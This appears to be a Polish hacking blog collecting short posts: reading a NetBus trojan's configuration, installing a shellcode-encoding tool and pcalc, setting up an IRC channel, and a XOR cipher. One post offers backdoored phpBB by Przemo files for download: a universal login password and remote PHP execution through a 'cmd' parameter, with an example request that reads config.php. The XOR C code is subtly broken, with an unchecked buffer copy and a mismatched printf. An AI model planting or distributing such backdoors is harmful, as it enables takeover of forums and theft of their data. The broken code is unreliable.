NetBus vs strings

Nie wiem czy ktoś jeszcze ma możliwość zainfekowania tym trojanem, ponieważ jego wykrywalność przez antywiry jest 100 procentowa (no chyba że nie używasz antywira ale to Twoja sprawa ;))
Otóż możemy w łatwy sposób odczytać konfigurację NetBusa (hasło,port,maile na które logowane jest uruchomienie):
1. Pobieramy pakiet MinGw i instalujemy go
2. Wchodzimy w Start>Uruchom>cmd.exe
3. Wchodzimy do katalogu gdzie zapisany jest server za pomocą cd
4. Wpisujemy C:\sciezka_do_MinGw\bin\strings.exe Patch.exe
5. Na końcu wydruku widzimy dane konfiguracyjne NetBusa (:P) wyglądające mniej więcej tak:

[Settings]
Port1=12345
ServerPwd=zaq@wsk
LogTraffic=1
MailTo=example@site.com
MailFrom=example@example.org
MailHost=smtp.example.org

Teraz możemy przeszukać sieć lokalną czy nasz atakujący nie znalazł innych ofiar i za pomocą opcji Okno dialogowe wysłać informacje jego ofiarom, że zostały zarażone oraz info jak usunąć tego trojana 😉

Reklamy

PHPBB by Przemo backdoor

Dziś chciałbym przedstawić dwa zbackdoorowane elementy PHPBB by Przemo: login.php i viewtopic.php
Login zalogowanie się na dowolne konto w systemie za pomocą uniwersalnego hasła (domyślnie hackbb, ale można zmienić :P)
Viewtopic pozwala na zdalne wykonanie kodu PHP poprzez parametr cmd (/viewtopic.php?p=id_tematu&cmd=instrukcja_php_zakończona średnikiem [średnik to ; jak by ktoś nie wiedział :P])
Na przykład:
http://example.com/sciezka_do_phpbb_by_przemo/viewtopic.php?p=7&cmd=readfile("config.php");

Backdoora do Przema można pobrać tutaj:
http://www.sendspace.com/file/4df4gy
(w środku m.in instrukcja dla niezorientowanych jak wrzucić backdoora na forum :P)
Od razu piszę:
backdoor nie działa na systemie fora.pl, chociaż serwis ten hostuje fora z tym systemem to tworzy on
gotowe fora bez możliwości uploadu niczego 😀

Sprawdzałem na jednym darmowym hostingu (friko.pl) i też działał ;P

Instalacja dissembler-a

Dissembler to generator polimorficznego kodu powłoki z drukowalnymi znakami ASCII
Jego autorem jest Jon Erickson autor „Hacking – Sztuka penetracj” (tu wersja OnLine w języku angielskim, polską wersję wydrukowało w wydaniu książkowym wydawnictwo Helion), członek Phiral Research Lab. Strona grupy nie działa, więc Ci co mają tą książkę mają też problem skąd to narzędzie wziąć 😉
Na szczęście internetowy robot archive.org ma w swoich archiwach kopię strony i programu 😀
Znajduje się on tu:
http://web.archive.org/web/20070305111749/http://phiral.com/research/dissembler_0.9.tgz
Proces instalacji wygląda tak:

root@localhost:~# wget http://web.archive.org/web/20070305111749/http://phiral.com/research/dissembler_0.9.tgz
...
root@localhost:~# tar xvf dissembler_0.9.tgz
root@localhost:~# cd dissembler_0.9
root@localhost:~/dissembler_0.9# gcc -o dissembler dissembler.c
...
root@localhost:~/dissembler_0.9# mv dissembler /bin/
root@localhost:~/dissembler_0.9# cd ..
root@localhost:~# dissembler
dissembler 0.9 - polymorphs bytecode to a printable ASCII string
- Jon Erickson Phiral Research Labs -
438C 0255 861A 0D2A 6F6A 14FA 3229 4BD7 5ED9 69D0

Usage: dissembler [switches] bytecode

Optional dissembler switches:
-t near where the bytecode is going
-N optimize with ninja magic
-s size changes target, adjust with orig size
-b number of words in the NOP bridge
-c which chars are considered printable
-w write dissembled code to output file
-e escape the backlash in output

root@localhost:~#

I mamy dissemblera 😛

Instalacja pcalc

Ten turorial został przgotowany pod systemem Ubuntu
Nie wiem jak będzie działał pod innymi systemami 😀
Pcalc to kalkulator dla programistów. Został on opisany w „Hacking – Sztuka penetracji”
Na początek pobieramy wgetem pcalc i rozpakowujemy go

root@localhost:~# wget http://sourceforge.net/projects/pcalc/files/pcalc-1.1.tar.bz2
...
root@localhost:~# tar xvf pcalc-1.2.tar.bz2
...
root@localhost:~# cd pcalc-1.2
root@localhost:~/pcalc-1.2#

Teraz ściągamy pakiety Flex i Bison, które są potrzebne do poprawnego skompilowania programu

root@localhost:~/pcalc-1.2# apt-get install flex
...
root@localhost:~/pcalc-1.2# apt-get install bison
...
root@localhost:~/pcalc-1.2#

Teraz możemy wykonać już make & make install

root@localhost:~/pcalc-1.2# make
...
root@localhost:~/pcalc-1.2# make install
...
root@localhost:~/pcalc-1.2# pcalc

Programmer's calculator by Peter Glen. Version 1.2

For functions type pcalc f
For controls type pcalc l
For operators type pcalc o
For constants type pcalc c

root@localhost:~pcalc-1.2#

Gotowe! 🙂

Prosty i efektywny czat na stronę

1. Wybór serwera
Na początku musimy wybrać jakiś serwer IRC z tej listy: http://pirc.pl/serwery i wejść na niego 🙂
2. Rejestracja nicka
Po 15 minutach wpisujemy komendę:
/msg NickServ REGISTER haslo_do_konta_IRC nasz_mail
Nasępnie podajemy poniższe komendy:
/msg NickServ set secure on
/msg NickServ set kill quick
Powyższe komendy sprawią, ze nikt nam nie zajebie nicka, co jest ważne 😛
3. Rejestracja kanału
Następną czynnością jest rejestracja kanału, robimy to tak:
Wchodzimy na kanał, i jeśli tren kanał nie istnieje dostajemy autopa 😉
Wpiujemy komendę
/msg ChanServ REGISTER nazwa_kanału hasło_do_kanalu opis
haslo_do_kanalu i tak nie jest później wymagane aby wejść na kanał 😉
Następnie ustawiamy wiadomość powitalną:
/msg ChanServ set kanał entrymsg wiadomość_powitalna
Ustawiamy temat:
/topic #nazwa_kanalu temat
4. Przypisanie bota:
Na początku wybieramy jednego bota z podanych:
Elektroda
Hinagiku
Leszek_Miller
Nienormalny
Security
sufitowy-kot
zbyszek
i wpisujemy
/msg BotServ ASSIGN nazwa_kanału nazwa_bota
Ustawiamy parametry kanału:
/msg BotServ set nazwa_kanału opcja parametry (np /msg BotServ #naszkanal DONTKICKOPS ON)
DONTKICKOPS (ON|OFF) – Bot nie będzie kopać operatorów kanału.
DONTKICKVOICES (ON|OFF) – Bot nie kopie osób z prawem głosu (+v).
GREET – Bot będzie wyświetlać użytkownikom wchodzącym na kanał wiadomość powitalną.
FANTASY (ON|OFF) – Bot będzie reagował na publiczne komendy, typu !op, !voice, !halfop, !kick, !ban, !topic – ustawienia dostępu zależą od ustawień listy ACCESS/XOP kanału.
SYMBIOSIS (ON|OFF) – Bot przejmuje wszystkie zadania które wykonuje chanserv
[FUNKCJE SYMBIOSIS USTAW NA ON!]
Ustawiamy listę brzydkich słów:
/msg BotServ BADWORDS ADD słowo [SINGLE | START | END] – dodaje wskazane słowo do listy. Parametr SINGLE powoduje, że użytkownicy będą kopani za używanie wskazanego słowa w całości. Parametr START powoduje, że użytkownicy będą kopani za używanie wskazanego słowa na początku innych wyrazów. Parametr END powoduje, że użytkownicy będą kopani za używanie wskazanego słowa na końcu innych wyrazów. Pominięcie parametru powoduje, że użytkownicy będą kopani w każdym z przypadków, kiedy zostanie użyte wskazane słowo.
/msg BotServ BADWORDS DEL {słowo | numer-wpisu | lista} – usuwa wskazane wpisy z listy słów. Jako argument przyjmuje słowo, numer wpisu lub listę (przykład poniżej dla polecenia LIST).
/msg BotServ BADWORDS LIST [maska | lista] – wyświetla zawartość listy słów. Jeśli zostanie podana maska tylko pasujące wpisy zostaną pokazane. Można także użyć listy, przykład: /msg BotServ BADWORDS LIST 2-5,7-9 listuje wpisy od numeru 2 do 5 oraz od 7 do 9.
/msg BotServ BADWORDS CLEAR – usuwa wszystkie wpisy z listy.
I włączamy kopanie za brzydkie słowa 😉
/msg BotServ KICK nazwa_kanału BADWORDS on
Teraz ustawiamy XOP:
/msg ChanServ status nazwa_kanału ADD login
Login MUSI być zarejestrowany na serwerze
Staus to jedna z 4 komend:
VOP – Automatyczny voice (+v)
HOP – Automatyczny halfop (+h)
AOP – Automatyczny op (+o)
SOP – Automatyczny protect (+a)
Na początek ustawiamy dla nas autoopa
/msg ChanServ AOP #NaszKanal ADD nasz_login
i halfopy dla naszych współpracowników 😉
/msg ChanServ HOP #NaszKanal ADD login_pomocnika
Teraz nadeszła pora aby wstawić nasz czat na stronę\forum\blog itp 😀
Tworzymy skrypt php i wklejamy do niego:

<?
$USERS=file_get_contents('http://pirc.pl/api/nazwa_naszego_kanalu/users&#039;); /* Zwraca ilość użytkowników na kanale */
$TOPIC=file_get_contents('http://pirc.pl/api/nazwa_naszego_kanalu/topic&#039;); /* Zwraca temat ustawiony na kanale */
$MESSG=file_get_contents('http://pirc.pl/api/nazwa_naszego_kanalu/messages&#039;); /* Zwraca ilość wiadomości
wysłanych na kanał */
echo("Na czacie jest $USERS użytkowników
");
echo("Temat kanału: $TOPIC
");
echo("Dotychczas wysłano $MESSG wiadomości
");
/* Powyższe dane można obrobić za pomocą stylów CSS */

?>

Reklamowanie kanału
Jeśli chcemy zdobyć wielu użytkowników musimy zareklamować nasz kanał 😉
Aby to zrobić informujemy użytkowników kanału że jeśli chcą pomóc to niech umieszczą baner kanału na
swojej stronie\forum\blogu itp
Adres do baneru dla kanału
http://pirc.pl/banner/channel/nazwa_kanału/ ( / musi być na końcu! )
I to byłoby na tyle 😉
Informacje czerpałem z oficjalnej strony serwera PIRC:
http://pirc.pl
DODATKOWE INFORMACJE (z strony powyżej)
NickServ – http://pirc.pl/teksty/p_nickserv
ChanServ – http://pirc.pl/teksty/p_chanserv
BotServ – http://pirc.pl/teksty/p_botserv
HostServ – http://pirc.pl/teksty/p_hostserv (VHOST)
MemoServ – http://pirc.pl/teksty/p_memoserv (odpowiada za wysyłanie\odbieranie wiadomości do innych
uzytkowników nawet jeśli nie są dosŧępni)
Zarządzanie uzytkownikami – http://pirc.pl/teksty/uzytkownicy
Zarzadzanie kanałem – http://pirc.pl/teksty/kanaly
Lista komend na serwerze – http://pirc.pl/teksty/komendy
Najczęstrze problemy – http://pirc.pl/teksty/p_problem
PIRC API (wyświetlanie ilości użytkowników, tematu kanalu itp) – http://pirc.pl/teksty/p_api
Informacje o umieszczaniu bramki IRC na stronie – http://pirc.pl/teksty/bramka

XOR coder

Szyfr XOR to jeden z najprostszych sposób zaszyfrowania swoich danych.
Na samym początku podam co to jest ten XOR, otóż jest to operacja bitowa, która ustawia bit, gdy dwa podane argumenty (powiedzmy a i b) są różne
Tak więc:
1 xor 1 = 0
0 xor 0 = 0
1 xor 0 = 1
0 xor 1 = 1
Więcej o operacjach bitowych możesz przeczytać tu
Na czym polega szyfrowanie XOR?
Otóż gdy mamy jakiś znak, np A ,to temu znakowi przypisany jest jego kod ASCII w wartości dziesiętnej – dla A jest to 65. Na podstawie tego możemy obliczyć, że hexadecymalna wartość kodu A to 41 a binarna 01000001.
Żeby znaleźć kod ASCII danej litery możemy zerknąć tu
a żeby przetłumaczyć tekst na różne wariacje kodu ASCII należy zajrzeć tu
Kiedy chcemy zaszyfrować tekst to pobieramy wartość binarną każdego znaku i wykonujemy na niej operacje XOR, gdzie drugim argumentem jest nasz kod, który również jest zamieniany na wartość binarną gdybyśmy chcieli zaszyfrować znak
A przy użyciu liczby 12 wyglądałoby to mniej więcej tak:
xor 01000001,1100
i dałoby to wartość: 01001101 co jest równoznaczne z literą M tak więc
xor A,12 => M

Na koniec kod cryptera w języku C szyfrującego dane za pomocą szyfru XOR 😉

#include
#include
int main(int argc,char *argv[]){
if(argc<3){
printf(
"Prosty XOR coder\n"
"Uzycie: %s tekst_do_zaszyfrowania kod\n",argv[0]);
exit(0);
}
int i,k;
int code=atoi(argv[2]);
char text[100];
strcpy(text,argv[1]);
for(i=0;i<strlen(text);i++){
text[i]^=code;
}
printf("%s %s\n",text);
}